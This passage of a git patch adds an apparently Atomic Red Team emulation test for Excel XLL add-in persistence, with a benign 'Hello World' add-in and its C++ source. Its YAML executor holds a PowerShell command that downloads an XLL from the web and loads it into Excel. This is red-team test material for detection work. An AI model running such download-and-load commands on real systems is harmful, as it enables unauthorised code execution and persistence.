From d0e8a59a287e72ee82783f20cd8c201f8e3fb409 Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Fri, 6 Aug 2021 16:58:52 -0500
Subject: [PATCH 01/39] T1137 xll (#1592)

* upload xll and source

* T1137.006 yaml

* Update T1137.006.yaml

fix yaml error, swap out final url for xll

* cleaning directories

deleted the gitignore, added src and bin directories and moved the appropriate files there.  modified the xll url to include the bin directory

* remove extra comments

Co-authored-by: Brandon Morgan <bmorgan@nti.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1137.006/T1137.006.yaml              |  30 +++
 atomics/T1137.006/bin/HelloWorldXll.xll       | Bin 0 -> 10240 bytes
 atomics/T1137.006/src/COPYING                 |  12 ++
 atomics/T1137.006/src/HelloWorldXll.sln       |  28 +++
 .../src/HelloWorldXll/HelloWorldXll.cpp       |  21 ++
 .../src/HelloWorldXll/HelloWorldXll.def       |   2 +
 .../src/HelloWorldXll/HelloWorldXll.vcxproj   | 190 ++++++++++++++++++
 .../HelloWorldXll.vcxproj.filters             |  44 ++++
 .../T1137.006/src/HelloWorldXll/dllmain.cpp   |  19 ++
 .../T1137.006/src/HelloWorldXll/stdafx.cpp    |   8 +
 atomics/T1137.006/src/HelloWorldXll/stdafx.h  |  15 ++
 .../T1137.006/src/HelloWorldXll/targetver.h   |   8 +
 atomics/T1137.006/src/readme.md               |  70 +++++++
 13 files changed, 447 insertions(+)
 create mode 100644 atomics/T1137.006/T1137.006.yaml
 create mode 100644 atomics/T1137.006/bin/HelloWorldXll.xll
 create mode 100644 atomics/T1137.006/src/COPYING
 create mode 100644 atomics/T1137.006/src/HelloWorldXll.sln
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/dllmain.cpp
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/stdafx.cpp
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/stdafx.h
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/targetver.h
 create mode 100644 atomics/T1137.006/src/readme.md

diff --git a/atomics/T1137.006/T1137.006.yaml b/atomics/T1137.006/T1137.006.yaml
new file mode 100644
index 00000000..628ece51
--- /dev/null
+++ b/atomics/T1137.006/T1137.006.yaml
@@ -0,0 +1,30 @@
+attack_technique: T1137.006
+display_name: 'Office Application Startup: Add-ins'
+
+atomic_tests:
+- name: Code Executed Via Excel Add-in File (Xll)
+  description: |
+    Downloads a XLL file and loads it using the excel add-ins library.
+    This causes excel to display the message "Hello World"
+    Source of XLL - https://github.com/edparcell/HelloWorldXll 
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    xll_url:
+      description: url of the file HelloWorldXll.xll
+      type: url
+      default: 'https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true'
+
+    local_file:
+      description: name of the xll file 
+      type: path
+      default: '$env:tmp\HelloWorldXll.xll'
+
+  executor:
+    name: powershell
+    elevation_required: true 
+    command: |
+      powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))"
+  
diff --git a/atomics/T1137.006/bin/HelloWorldXll.xll b/atomics/T1137.006/bin/HelloWorldXll.xll
new file mode 100644
index 0000000000000000000000000000000000000000..95d85d81d20c7286827b3ed391867e925dcb7d44
GIT binary patch
literal 10240
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
R%dXA4t}glw_4m&M{|hYk%2xmY

literal 0
HcmV?d00001

diff --git a/atomics/T1137.006/src/COPYING b/atomics/T1137.006/src/COPYING
new file mode 100644
index 00000000..cd20731c
--- /dev/null
+++ b/atomics/T1137.006/src/COPYING
@@ -0,0 +1,12 @@
+Copyright (c) 2015, Edward Parcell
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/atomics/T1137.006/src/HelloWorldXll.sln b/atomics/T1137.006/src/HelloWorldXll.sln
new file mode 100644
index 00000000..d86a261b
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.24720.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HelloWorldXll", "HelloWorldXll\HelloWorldXll.vcxproj", "{0A5476B7-2700-4B0C-A72C-3054B5064E96}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x64.ActiveCfg = Debug|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x64.Build.0 = Debug|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x86.ActiveCfg = Debug|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x86.Build.0 = Debug|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x64.ActiveCfg = Release|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x64.Build.0 = Release|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x86.ActiveCfg = Release|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp
new file mode 100644
index 00000000..d6bc4bf6
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp
@@ -0,0 +1,21 @@
+// HelloWorldXll.cpp : Defines the exported functions for the DLL application.
+//
+
+#include "stdafx.h"
+
+
+short __stdcall xlAutoOpen()
+{
+	char *text = "Hello world";
+	size_t text_len = strlen(text);
+	XLOPER message;
+	message.xltype = xltypeStr;
+	message.val.str = (char *)malloc(text_len + 2);
+	memcpy(message.val.str + 1, text, text_len + 1);
+	message.val.str[0] = (char)text_len;
+	XLOPER dialog_type;
+	dialog_type.xltype = xltypeInt;
+	dialog_type.val.w = 2;
+	Excel4(xlcAlert, NULL, 2, &message, &dialog_type);
+	return 1;
+}
\ No newline at end of file
diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def
new file mode 100644
index 00000000..e1759e99
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def
@@ -0,0 +1,2 @@
+EXPORTS
+	xlAutoOpen
diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj
new file mode 100644
index 00000000..2252a3a1
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj
@@ -0,0 +1,190 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{0A5476B7-2700-4B0C-A72C-3054B5064E96}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>HelloWorldXll</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+    <TargetExt>.xll</TargetExt>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetExt>.xll</TargetExt>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>_DEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB;%(AdditionalDependencies)</AdditionalDependencies>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>NDEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
